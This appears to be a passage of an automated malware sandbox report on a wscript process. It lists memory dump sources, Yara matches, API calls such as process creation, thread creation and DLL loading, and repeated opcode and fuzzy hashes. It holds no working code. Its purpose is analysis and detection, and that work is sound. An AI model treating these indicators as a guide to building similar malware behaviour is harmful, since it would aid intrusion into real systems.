                                                                                                                                                                              • Opcode ID: 0f3a473e73a1bc902e83cf65d070c7dc63a09df397422c314cb2e422a9b5b19e
                                                                                                                                                                              • Instruction ID: 3787aa0fe8572f270a894239c6d74780a55df40debaa2e3f06ff6bf1be1da6b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f3a473e73a1bc902e83cf65d070c7dc63a09df397422c314cb2e422a9b5b19e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E900225211D0042F200B5688C28F0700498BD0307F55C125E0155558CC955D9615521
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c9aad254423a1a02a47e3989b53fa9110712f323757c68fe73f84b24d44dc1a5
                                                                                                                                                                              • Instruction ID: 36d5349a522105087dfcd85d8e2d12f5367dc1c08d3ff01235f2fd82a597489e
                                                                                                                                                                              • Opcode Fuzzy Hash: c9aad254423a1a02a47e3989b53fa9110712f323757c68fe73f84b24d44dc1a5
                                                                                                                                                                              • Instruction Fuzzy Hash: E590026534150442F100B1588428F060049CBE1305F55C025E1065558D8659DD526126
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c514854601dd467857bda506241dffe4c2b286efe094f1022bed2cb9bbaa790a
                                                                                                                                                                              • Instruction ID: 931b7af2ce45bc6189cf371cd4baa5e188187d4f055177f3e66c98ad5a7321de
                                                                                                                                                                              • Opcode Fuzzy Hash: c514854601dd467857bda506241dffe4c2b286efe094f1022bed2cb9bbaa790a
                                                                                                                                                                              • Instruction Fuzzy Hash: B590022524555102F150B15C8418A164049ABE0205F55C031E0815598D8595D9556221
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 7f05d6ab0401767aa8fa602385436996a933af58a168a3b7f34bd732aa3dbb3d
                                                                                                                                                                              • Instruction ID: 90692436cbf4e073341be4163a5204c3f017dde4adb20ec3e08dcf2f4d23de2c
                                                                                                                                                                              • Opcode Fuzzy Hash: 7f05d6ab0401767aa8fa602385436996a933af58a168a3b7f34bd732aa3dbb3d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B900229211500032105F5584718907008A8BD5355355C031F1016554CD661D9615121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 4c529a5e2e86262cf84c0fd8998ebae3b093c3bebc8920c5c2b94af59c31ef8a
                                                                                                                                                                              • Instruction ID: 4e8d22501b34fe6a65fad884fcdd2b21ba5df6de74aa905486689e3e5e5e9780
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c529a5e2e86262cf84c0fd8998ebae3b093c3bebc8920c5c2b94af59c31ef8a
                                                                                                                                                                              • Instruction Fuzzy Hash: 99900229221500022145F558461890B04899BD6355395C025F1417594CC661D9655321
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e39f9a433b8cc4914c811c473e117a3b17f83d5ed542a0fd3658b36534097b02
                                                                                                                                                                              • Instruction ID: 2ccd2ce00c3e5328af2e240432bb4a07242025543762fe94ebe4e5180f4d1e4e
                                                                                                                                                                              • Opcode Fuzzy Hash: e39f9a433b8cc4914c811c473e117a3b17f83d5ed542a0fd3658b36534097b02
                                                                                                                                                                              • Instruction Fuzzy Hash: 5690023560550802F150B1588428B4600498BD0305F55C021E0025658D8795DB5576A1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 40e3ab250a0fcfb2fc31dcb1073c264c282525c3cef9a175fb7488404a8a9d62
                                                                                                                                                                              • Instruction ID: d3bf320435f6da78691e4d25c51e24ee620416683239d03375380f07b3e0ae54
                                                                                                                                                                              • Opcode Fuzzy Hash: 40e3ab250a0fcfb2fc31dcb1073c264c282525c3cef9a175fb7488404a8a9d62
                                                                                                                                                                              • Instruction Fuzzy Hash: EC90023520150802F180B1588418A4A00498BD1305F95C025E0026658DCA55DB5977A1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: ed8c2542d7b49bfdd2c11a916034474d65cf447ec3303095c7782b99e9064cfc
                                                                                                                                                                              • Instruction ID: 91ca33d3080d02a3f54f01141eee43f1cdb14f481e58fd16af111a7bb6b412d1
                                                                                                                                                                              • Opcode Fuzzy Hash: ed8c2542d7b49bfdd2c11a916034474d65cf447ec3303095c7782b99e9064cfc
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C90023520554842F140B1588418E4600598BD0309F55C021E0065698D9665DE55B661
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f2f9d39ac55d6a29fd085f386003f72e71a54c614d516ea9f9bca37550431927
                                                                                                                                                                              • Instruction ID: 36580a06d1b5a413938733b772f9cb698234893e530ddcd4b856a4251f2ed1de
                                                                                                                                                                              • Opcode Fuzzy Hash: f2f9d39ac55d6a29fd085f386003f72e71a54c614d516ea9f9bca37550431927
                                                                                                                                                                              • Instruction Fuzzy Hash: F4900265202500036105B1588428A16404E8BE0205B55C031E1015594DC565D9916125
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                                              • String ID: @J7<
                                                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                                                              • Opcode ID: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                                                                                              • Instruction ID: c736d6f1758b9b2b0ec61c69eaf3e1630beb5b023eb86798ef02d471b6c6f608
                                                                                                                                                                              • Opcode Fuzzy Hash: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                                                                                              • Instruction Fuzzy Hash: 403162B5A0060A9FDB11DFD8D8809EFB3B9FF88304B108569E515EB204D775EE45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                                              • String ID: @J7<
                                                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                                                              • Opcode ID: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                                                                                              • Instruction ID: 01828fa5fc2a3fb607376814e7112254e84dbcb1970a77e536a4996a68b7b173
                                                                                                                                                                              • Opcode Fuzzy Hash: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                                                                                              • Instruction Fuzzy Hash: E23150B5A0020A9FDB11DFD8D8809EFB3B9FF88304B108569E515EB204D775EE45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00379A8C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID: A46
                                                                                                                                                                              • API String ID: 3298025750-4203305099
                                                                                                                                                                              • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction ID: 4b21d69e1adffffca8fecff74b60d35e3b8bae9f26226d9ce1ca02c7fdef12b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction Fuzzy Hash: C4E06D762002087BC610EE59DC45FDB73ACEFC9710F004018FA08AB242DA30B91187B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00373D4B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                              • String ID: wininet.dll
                                                                                                                                                                              • API String ID: 3472027048-3354682871
                                                                                                                                                                              • Opcode ID: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                                                                                              • Instruction ID: b6f4a20cb894abfd9789f024b199e56062ceed3cc1851ed92ec022f665dead70
                                                                                                                                                                              • Opcode Fuzzy Hash: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                                                                                              • Instruction Fuzzy Hash: 75318BB1600605BBD724DFA4CC81FEBBBB9BB88700F10811CF95D6B241C3746A50CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00364762
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction ID: 22c1dbb96d74bda94d9b1887c69462412f5306393a049284fcbe12928874f97a
                                                                                                                                                                              • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction Fuzzy Hash: 36011EB9D0020DABDB11EAA4DC42F9DB7789B54708F108195E91C9B241F675EB148B91
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,003684BE,00000010,?,?,?,00000044,?,00000010,003684BE,?,?,?), ref: 00379B40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                                              • Opcode ID: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                                                                                              • Instruction ID: 40f5b98218759c67aa37a68a93c4b0dc96490e517c93aba225f8084ecdbf525d
                                                                                                                                                                              • Opcode Fuzzy Hash: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                                                                                              • Instruction Fuzzy Hash: 1501CCB2204508BBDB54DE99DC81EEB77AEAF8D710F008208BA0DA7241D634F8518BA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00359F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                              • Opcode ID: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                                                                                              • Instruction ID: 99197ced71b96e0aa057f20fcf13f198b6a47a12302c165e49700974cbba43c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                                                                                              • Instruction Fuzzy Hash: 38F0653334021436E33165A99C42FD7B64CDB80761F19442AFB0CEE1C1D996B80142E4
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00359F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                              • Opcode ID: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                                                                                              • Instruction ID: 3b6e4eb7a4e509237552d8315052e8dc089be16cf96fb4df617cd76cb765f324
                                                                                                                                                                              • Opcode Fuzzy Hash: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF0923324030436E23165A98C43FA7769C9B80B91F29401AFB0DEF1C1E9A6B80282E4
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00361BB9,?,?,00361BB9,^X7,?,?,00361BB9,^X7,00001000,?,?,00000000), ref: 00379A3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction ID: b347112d34cfc93de1323fb4e1e356f566be546dce8e65fbf591c188bf31e69c
                                                                                                                                                                              • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E09276200204BBD650EE59DC41FEF37ACEFC5750F004018F909A7241CA30B8118BB4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0036852C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                                                                                              • Instruction ID: 140eeb44a64c4e814413cf86bda897860a41b85c5f76698896bb116db6db6101
                                                                                                                                                                              • Opcode Fuzzy Hash: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 97E0263220020427FB206BB8EC46F623388AB4C764F498760BA1EDBAC5F939FC024150
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0036852C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                                                                                              • Instruction ID: fa2e8ac71f5380fa4b80726bace897f9d63af8cda9e6b2fcaa5b92796a565856
                                                                                                                                                                              • Opcode Fuzzy Hash: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                                                                                              • Instruction Fuzzy Hash: FAE0263210020437E7206B68DC46F653388AB4C760F498710BA1A9B6C5EA38FC024150
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00361EC0,0037819F,^X7,00361E83), ref: 00368323
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                              • Opcode ID: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                                                                                              • Instruction ID: bc6a99186809d441915af43bbae6b27673b638c5f39e14fe768a90da39a01626
                                                                                                                                                                              • Opcode Fuzzy Hash: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                                                                                              • Instruction Fuzzy Hash: 43D05E763803047BF611A6E48C57F16328D9B48790F4581A8BA0CEA6C2E856F5004669
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 00360F97
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                              • Instruction ID: a219b0986278317aa8b81b5f600e8aeba9ea4d81031daf4ac75f88ad2f908812
                                                                                                                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                              • Instruction Fuzzy Hash: FED02277B0000C7AAA1245C4ACC2CFFB76CEB84BA6F008063FF08E6040E6618D060BB0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 52dec4e3dbe1003c7a28a31e5d09be7af1a5f981fc554211251df400b2abce17
                                                                                                                                                                              • Instruction ID: 472432c3c378f94f4cccef7fd225ed9dedb82712373a710076f6c66c54895d80
                                                                                                                                                                              • Opcode Fuzzy Hash: 52dec4e3dbe1003c7a28a31e5d09be7af1a5f981fc554211251df400b2abce17
                                                                                                                                                                              • Instruction Fuzzy Hash: EDB09B759015C5C5FB11F760460CB1779446BD1705F15C0B1D2030645F4778E1D1E175
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500172226.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_4710000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                                                                                              • Instruction ID: 7e62812a09b567facec3da0921a2fcc8066b9c935f7aa120577e69aab0303bcd
                                                                                                                                                                              • Opcode Fuzzy Hash: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0641F971618B4D4FD368AF6C9085676B3E2FB89304F50092DD98BC3762EA70F8868785
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500172226.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
